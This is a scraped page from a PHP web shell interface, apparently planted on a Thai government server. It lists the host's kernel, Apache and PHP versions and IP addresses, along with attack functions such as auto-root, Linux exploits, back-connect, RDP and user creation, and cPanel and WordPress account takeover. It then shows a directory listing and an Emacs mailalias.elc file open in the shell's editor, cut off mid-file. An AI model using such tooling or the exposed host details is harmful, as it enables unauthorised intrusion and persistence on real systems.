Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
mail /
[ HOME SHELL ]
Name
Size
Permission
Action
binhex.elc
9.01
KB
-rw-r--r--
blessmail.el
2.51
KB
-rw-r--r--
emacsbug.elc
7.55
KB
-rw-r--r--
feedmail.elc
79.59
KB
-rw-r--r--
footnote.elc
21.09
KB
-rw-r--r--
hashcash.elc
10.81
KB
-rw-r--r--
mail-extr.elc
33.9
KB
-rw-r--r--
mail-hist.elc
13.74
KB
-rw-r--r--
mail-utils.elc
9.55
KB
-rw-r--r--
mailabbrev.elc
13.96
KB
-rw-r--r--
mailalias.elc
13.52
KB
-rw-r--r--
mailclient.elc
3.56
KB
-rw-r--r--
mailheader.elc
5.92
KB
-rw-r--r--
mailpost.elc
2.3
KB
-rw-r--r--
metamail.elc
4.44
KB
-rw-r--r--
mspools.elc
7.25
KB
-rw-r--r--
reporter.elc
9.65
KB
-rw-r--r--
rfc2368.elc
2.46
KB
-rw-r--r--
rfc822.elc
5.71
KB
-rw-r--r--
rmail-spam-filter.elc
13.24
KB
-rw-r--r--
rmail.elc
113.93
KB
-rw-r--r--
rmailedit.elc
8.83
KB
-rw-r--r--
rmailkwd.elc
5.12
KB
-rw-r--r--
rmailmm.elc
11.05
KB
-rw-r--r--
rmailmsc.elc
1.56
KB
-rw-r--r--
rmailout.elc
15.73
KB
-rw-r--r--
rmailsort.elc
6.33
KB
-rw-r--r--
rmailsum.elc
52.51
KB
-rw-r--r--
sendmail.elc
51.72
KB
-rw-r--r--
smtpmail.elc
21.58
KB
-rw-r--r--
supercite.elc
58.99
KB
-rw-r--r--
uce.elc
7.66
KB
-rw-r--r--
undigest.elc
7.88
KB
-rw-r--r--
unrmail.elc
4.69
KB
-rw-r--r--
uudecode.elc
6.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mailalias.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:21 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/mail/mailalias.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`mailalias.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\302\303\304\305\306\307%\207" [require sendmail custom-declare-group mailalias nil "Expanding mail aliases." :group mail] 6) #@57 List of files from which to determine valid user names. (custom-declare-variable 'mail-passwd-files ''("/etc/passwd") '(#$ . 765) :type '(repeat string) :group 'mailalias) #@65 Shell command to retrieve text to add to `/etc/passwd', or nil. (custom-declare-variable 'mail-passwd-command 'nil '(#$ . 943) :type '(choice string (const nil)) :group 'mailalias) #@85 Alist of mail address directory entries. When t this still needs to be initialized. (defvar mail-directory-names t (#$ . 1130)) (byte-code "\301B\302\301!\204 \303\301\304\"\210\301\207" [current-load-list mail-address-field-regexp default-boundp set-default "^\\(Resent-\\)?\\(To\\|From\\|CC\\|BCC\\|Reply-to\\):"] 3) #@239 Alist of header field and expression to return alist for completion. The expression may reference the variable `pattern' which will hold the string being completed. If not on matching header, `mail-complete-function' gets called instead. (custom-declare-variable 'mail-complete-alist '(cons '("^\\(Resent-\\)?\\(To\\|From\\|CC\\|BCC\\|Reply-to\\):" mail-get-names pattern) '(("Newsgroups:" if (boundp 'gnus-active-hashtb) gnus-active-hashtb (if (boundp news-group-article-assoc) news-group-article-assoc)) ("Followup-To:" mail-sentto-newsgroups))) '(#$ . 1459) :type 'alist :group 'mailalias) (put 'mail-complete-alist 'risky-local-variable t) #@276 Specifies how \[mail-complete] formats the full name when it completes. If `nil', they contain just the return address like: king@grassland.com If `parens', they look like: king@grassland.com (Elvis Parsley) If `angles', they look like: Elvis Parsley <king@grassland.com> (custom-declare-variable 'mail-complete-style ''angles '(#$ . 2110) :type '(choice (const angles) (const parens) (const nil)) :group 'mailalias) #@72 Function to call when completing outside `mail-complete-alist'-header. (custom-declare-variable 'mail-complete-function ''ispell-complete-word '(#$ . 2536) :type '(choice function (const nil)) :group 'mailalias) #@99 Function to get completions from directory service or nil for none. See `mail-directory-requery'. (custom-declare-variable 'mail-directory-function 'nil '(#$ . 2754) :type '(choice function (const nil)) :group 'mailalias) #@157 When non-nil call `mail-directory-function' for each completion. In that case, one argument gets passed to the function, the partial string entered so far. (custom-declare-variable 'mail-directory-requery 'nil '(#$ . 2983) :type 'boolean :group 'mailalias) #@670 Shell command to get the list of names from a mail directory. This value is used when the value of `mail-directory-function' is `mail-directory-process'. The value should be a list of the form (COMMAND ARG ...), where each of the list elements is evaluated. COMMAND should evaluate to a string. When `mail-directory-requery' is non-nil, during evaluation of these elements, the variable `pattern' contains the partial input being completed. `pattern' is nil when `mail-directory-requery' is nil. The value might look like this: '(remote-shell-program "HOST" "-nl" "USER" "COMMAND") or like this: '(remote-shell-program "HOST" "-n" "COMMAND '^" pattern "'") (custom-declare-variable 'mail-directory-process 'nil '(#$ . 3247) :type 'sexp :group 'mailalias) (put 'mail-directory-process 'risky-local-variable t) #@65 List of (HOST SERVICE) for stream connection to mail directory. (custom-declare-variable 'mail-directory-stream 'nil '(#$ . 4074) :type 'sexp :group 'mailalias) (put 'mail-directory-stream 'risky-local-variable t) #@282 How to interpret the output of `mail-directory-function'. Three types of values are possible: - nil means to gather each line as one name - regexp means first \(grouping\) in successive matches is name - function called at beginning of buffer that returns an alist of names (custom-declare-variable 'mail-directory-parser 'nil '(#$ . 4295) :type '(choice (const nil) regexp function) :group 'mailalias) (put 'mail-directory-parser 'risky-local-variable t) #@246 Alist of local users, aliases and directory entries as available. Elements have the form (MAILNAME) or (MAILNAME . FULLNAME). If the value means t, it means the real value should be calculated for the next use. This is used in `mail-complete'. (defvar mail-names t (#$ . 4765)) #@66 Alist of local users. When t this still needs to be initialized. (defvar mail-local-names t (#$ . 5050)) #@326 Expand all mail aliases in suitable header fields found between BEG and END. If interactive, expand in header fields. Suitable header fields are `To', `From', `CC' and `BCC', `Reply-to', and their `Resent-' variants. Optional second arg EXCLUDE may be a regular expression defining text to be removed from alias expansions. (defalias 'expand-mail-aliases #[(beg end &optional exclude) "\306 \210\307=\203 \310\311 \210\212 b\210\312 \n\310\223\310\307\313\f\n\307#)\203\314\310w\210`\310\211\211\211\211\313\315\n\316#\210\317 \210\320\310x\210\321 b\210`W\203` \203p @AZV\203p A\211\204] \313\322\307#\203\206 \323\224`Z\202\217 \324!\323\325\"\310 !\326! \"\204\371 \326!\"A\211 \203\371 !ZB Bb\210 c\210\"\203\350 \327\"\330Q\321 #b\210\313#\n\307#\203\344 \331\332!\210\202\324 \nb\210*``Z\\|\210b\210\202b\210u\210*\202O \310\211\223\210.\202 \n\310\211\223*\207" [mail-aliases beg end case-fold-search mail-address-field-regexp disabled-aliases sendmail-sync-aliases t nil build-mail-aliases make-marker re-search-forward " " "^[^ ]" move beginning-of-line " \n" point-marker "[ ]*[\n,][ ]*" 0 marker-position buffer-substring-no-properties assoc "\\b\\(" "\\)\\b" replace-match "" seplen epos pos end1 beg1 translation string exclude regexp] 7 (#$ . 5162) (save-excursion (list (goto-char (point-min)) (mail-header-end)))]) #@140 Read mail aliases from personal aliases file and set `mail-aliases'. By default, this is the file specified by `mail-personal-alias-file'. (defalias 'build-mail-aliases #[(&optional file) "\306\206 !\307\211p\310\216\311\312!\211q\210\203\303 \313!\2031 \212\313!q\210\314ed\")c\210\202Q \315!\203>